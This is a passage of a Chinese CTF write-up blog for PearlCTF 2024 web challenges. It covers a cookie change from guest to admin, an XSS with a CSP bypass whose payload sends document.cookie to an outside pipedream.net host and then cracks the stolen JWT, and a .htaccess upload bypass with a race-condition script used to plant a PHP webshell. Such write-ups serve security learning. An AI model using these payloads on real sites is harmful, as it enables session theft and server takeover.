<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">You sure are hardworking</span><br><span class="line"></span><br><span class="line">but are you privileged enough?</span><br><span class="line"></span><br><span class="line">Here is what you want: s3cr3t1v3_m3th0d</span><br></pre></td></tr></table></figure>

<p>第二个问我们有没有权限，我们可以看到我们的Cookie是guest，把他改成admin就行了，下面看到文字有m3th0d，method就是访问方法，还有一个加粗的hardworking，先不知道是什么，先用方法和权限访问一下回显405，方法不对，那应该不是这个页面，试试<code>/hardworking</code>，访问后成功回显flag，这题也算是纯纯靠猜的脑洞题了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pearl&#123;c0ngr4t5_but_th1s_1s_just_th3_b3g1nn1ng&#125;</span><br></pre></td></tr></table></figure>

<h2 id="learn-HTTP-better-15-Solves-476-Points"><a href="#learn-HTTP-better-15-Solves-476-Points" class="headerlink" title="learn HTTP better(15 Solves&#x2F;476 Points)"></a><strong>learn HTTP better</strong>(15 Solves&#x2F;476 Points)</h2><p><a target="_blank" rel="noopener" href="https://v1-learn-http.ctf.pearlctf.in/">https://v1-learn-http.ctf.pearlctf.in/</a></p>
<p>是前面那题的升级版，和前面那题一样是xss，给了源码，js文件没什么改变，主要看go的源码</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;net&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line">	<span class="string">&quot;strings&quot;</span></span><br><span class="line">	<span class="string">&quot;net/url&quot;</span></span><br><span class="line">)</span><br><span class="line"><span class="keyword">const</span> (</span><br><span class="line">	SERVER_HOST = <span class="string">&quot;localhost&quot;</span></span><br><span class="line">	SERVER_PORT = <span class="string">&quot;5001&quot;</span></span><br><span class="line">	SERVER_TYPE = <span class="string">&quot;tcp&quot;</span></span><br><span class="line">)</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	fmt.Println(<span class="string">&quot;Server Running...&quot;</span>)</span><br><span class="line">	server, err := net.Listen(SERVER_TYPE, SERVER_HOST+<span class="string">&quot;:&quot;</span>+SERVER_PORT)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(<span class="string">&quot;Error listening:&quot;</span>, err.Error())</span><br><span class="line">		os.Exit(<span class="number">1</span>)</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">defer</span> server.Close()</span><br><span class="line"></span><br><span class="line">	fmt.Println(<span class="string">&quot;Listening on &quot;</span> + SERVER_HOST + <span class="string">&quot;:&quot;</span> + SERVER_PORT)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> &#123;</span><br><span class="line">		connection, err := server.Accept()</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			fmt.Println(<span class="string">&quot;Error accepting: &quot;</span>, err.Error())</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">go</span> processClient(connection)</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">processClient</span><span class="params">(connection net.Conn)</span></span> &#123;</span><br><span class="line">	buffer := <span class="built_in">make</span>([]<span class="type">byte</span>, <span class="number">1024</span>)</span><br><span class="line">	mLen, err := connection.Read(buffer)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(<span class="string">&quot;Error reading:&quot;</span>, err.Error())</span><br><span class="line">	&#125;</span><br><span class="line">	raw_http_req := strings.Split(<span class="type">string</span>(buffer[:mLen]), <span class="string">&quot;\r\n&quot;</span>)[<span class="number">0</span>]</span><br><span class="line">	splitted_req := strings.Split(raw_http_req, <span class="string">&quot; &quot;</span>)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> splitted_req[<span class="number">0</span>] != <span class="string">&quot;GET&quot;</span> &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 405 Method Not Allowed\r\n\r\nCan only GET&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	parsed, err := url.Parse(splitted_req[<span class="number">1</span>])</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(<span class="string">&quot;Error parsing: &quot;</span>, err.Error())</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	path := parsed.Path</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> path != <span class="string">&quot;/resp&quot;</span> &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 404 Not Found\r\n\r\nNot Found&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	args, err := url.ParseQuery(parsed.RawQuery)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 500 Internal Server Error\r\n\r\nError&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	body, ok := args[<span class="string">&quot;body&quot;</span>]</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> !ok &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 200 OK\r\n\r\nGive me some body&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	splitted_resp := strings.Split(body[<span class="number">0</span>], <span class="string">&quot;\r\n\r\n&quot;</span>)</span><br><span class="line">	new_header := strings.Join([]<span class="type">string</span>&#123;splitted_resp[<span class="number">0</span>], <span class="string">&quot;Content-Security-Policy: script-src &#x27;self&#x27;&quot;</span>&#125;, <span class="string">&quot;\r\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">	final_body := strings.Join([]<span class="type">string</span>&#123;new_header, splitted_resp[<span class="number">1</span>]&#125;, <span class="string">&quot;\r\n\r\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">	_, err = connection.Write([]<span class="type">byte</span>(final_body))</span><br><span class="line">	connection.Close()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>多了一个</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">new_header := strings.Join([]<span class="type">string</span>&#123;splitted_resp[<span class="number">0</span>], <span class="string">&quot;Content-Security-Policy: script-src &#x27;self&#x27;&quot;</span>&#125;, <span class="string">&quot;\r\n&quot;</span>)</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>script-src</code> 是一个指令，用于控制特定页面的一组与脚本相关的权限，定义此策略后，当浏览器从任何其他来源加载脚本时，只会抛出错误消息。即使恶意攻击者成功的代码注入到 Web 站点时，也只能遇到错误消息</p>
</blockquote>
<p>既然是self我们只需要把他定向到自己就可以了</p>
<p>那么我们构造出来脚本就为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;/resp?body=HTTP%252F1.1%2520200%2520OK%250D%250A%250D%250Aalert(1)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>成功弹窗，最后构造payload</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HTTP%2F1.1 200 OK%0D%0A%0D%0A&lt;script src=&quot;/resp?body=HTTP%252F1.1%2520200%2520OK%250D%250A%250D%250Adocument.location.href=%27https://eopv4zbo4fy4ld3.m.pipedream.net/?%27%252Bdocument.cookie&quot;&gt;&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>反弹回cookie</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiaWF0IjoxNzEwMjMxMTI1fQ._ej8la2uH7bscSM0WGhbtAt906crQ1OORF4zUtp9moo</span><br></pre></td></tr></table></figure>

<p>继续用hashcat看一下密钥是password</p>
<p>得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pearl&#123;w0w_7hat_w4s_0ut_Of_th3_boX&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Uploader-5-Solves-499-Points"><a href="#Uploader-5-Solves-499-Points" class="headerlink" title="Uploader(5 Solves&#x2F;499 Points)"></a><strong>Uploader</strong>(5 Solves&#x2F;499 Points)</h2><p>进去之后是一个upload界面，里面似乎只过滤文件内容，对文件名并不过滤，但是会对文件名进行hash</p>
<p>这个的后端过滤很奇怪，<code>&lt;&gt;[]()=</code>等字符似乎可以存在，但是，只要左右超过有两个字符就会被过滤，同时php也被过滤了，中间思考过程就不说了，说了就太长了，和一个师傅讨论了快两个小时才出，直接给出正确的思考答案</p>
<p>首先先上传<code>.htaccess</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ph\</span><br><span class="line">p_flag engine 1</span><br><span class="line">ph\</span><br><span class="line">p_value auto_prepend_file .ph\</span><br><span class="line">p</span><br></pre></td></tr></table></figure>

<p>是的！我们整了半天，发现是php的解析没开，当时也完全没有想到，而斜杠则是绕过php的过滤</p>
<p>而php则是简单的条件竞争就能传上去并解析，虽然还是会删除，但是传一个写木马上去解析就行，最后找到flag在<code>/opt/flag.txt</code>(也算是逆天这么能藏，加了.txt find也find不到，附上别的师傅的吐槽)</p>
<p><img src="/./tucao.png"></p>
<p>最后附上竞争代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getphpinfo</span>():</span><br><span class="line"></span><br><span class="line">    url = <span class="string">&quot;https://uploader-be0b0177dfa5950d.ctf.pearlctf.in&quot;</span></span><br><span class="line">    headers = &#123;</span><br><span class="line">    <span class="string">&quot;Host&quot;</span>: <span class="string">&quot;uploader-be0b0177dfa5950d.ctf.pearlctf.in&quot;</span>,</span><br><span class="line">    <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;multipart/form-data; boundary=---------------------------72940437516480145501393954295&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;https://uploader-be0b0177dfa5950d.ctf.pearlctf.in&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;https://uploader-be0b0177dfa5950d.ctf.pearlctf.in/&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Sec-Fetch-Dest&quot;</span>: <span class="string">&quot;document&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Sec-Fetch-Mode&quot;</span>: <span class="string">&quot;navigate&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Sec-Fetch-Site&quot;</span>: <span class="string">&quot;same-origin&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Sec-Fetch-User&quot;</span>: <span class="string">&quot;?1&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Te&quot;</span>: <span class="string">&quot;trailers&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10000</span>):</span><br><span class="line">        res= requests.get(<span class="string">&quot;https://uploader-be0b0177dfa5950d.ctf.pearlctf.in/uploads/10.80.1.9/.php&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(res.text)</span><br><span class="line">threads = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    thread = threading.Thread(target=getphpinfo)</span><br><span class="line">    threads.append(thread)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> thread <span class="keyword">in</span> threads:</span><br><span class="line">    thread.start()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> thread <span class="keyword">in</span> threads:</span><br><span class="line">    thread.join()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pearl&#123;d1d_y0u_just_d0uble_r4ce?&#125;</span><br></pre></td></tr></table></figure>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#learn-HTTP-76-Solves-50-Points"><span class="toc-number">1.</span> <span class="toc-text">learn HTTP(76 Solves&#x2F;50 Points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#I-am-a-web-noob-75-Solves-50-Points"><span class="toc-number">2.</span> <span class="toc-text">I am a web-noob(75 Solves&#x2F;50 Points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rabbithole-58-Solves-94-points"><span class="toc-number">3.</span> <span class="toc-text">rabbithole(58 Solves&#x2F;94 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#learn-HTTP-better-15-Solves-476-Points"><span class="toc-number">4.</span> <span class="toc-text">learn HTTP better(15 Solves&#x2F;476 Points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Uploader-5-Solves-499-Points"><span class="toc-number">5.</span> <span class="toc-text">Uploader(5 Solves&#x2F;499 Points)</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/07/14/prealCTF2024-wp/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/07/14/prealCTF2024-wp/&text=prealCTF2024 wp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/07/14/prealCTF2024-wp/&is_video=false&description=prealCTF2024 wp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=prealCTF2024 wp&body=Check out this article: http://example.com/2024/07/14/prealCTF2024-wp/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/07/14/prealCTF2024-wp/&name=prealCTF2024 wp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/07/14/prealCTF2024-wp/&t=prealCTF2024 wp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    oSthing
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
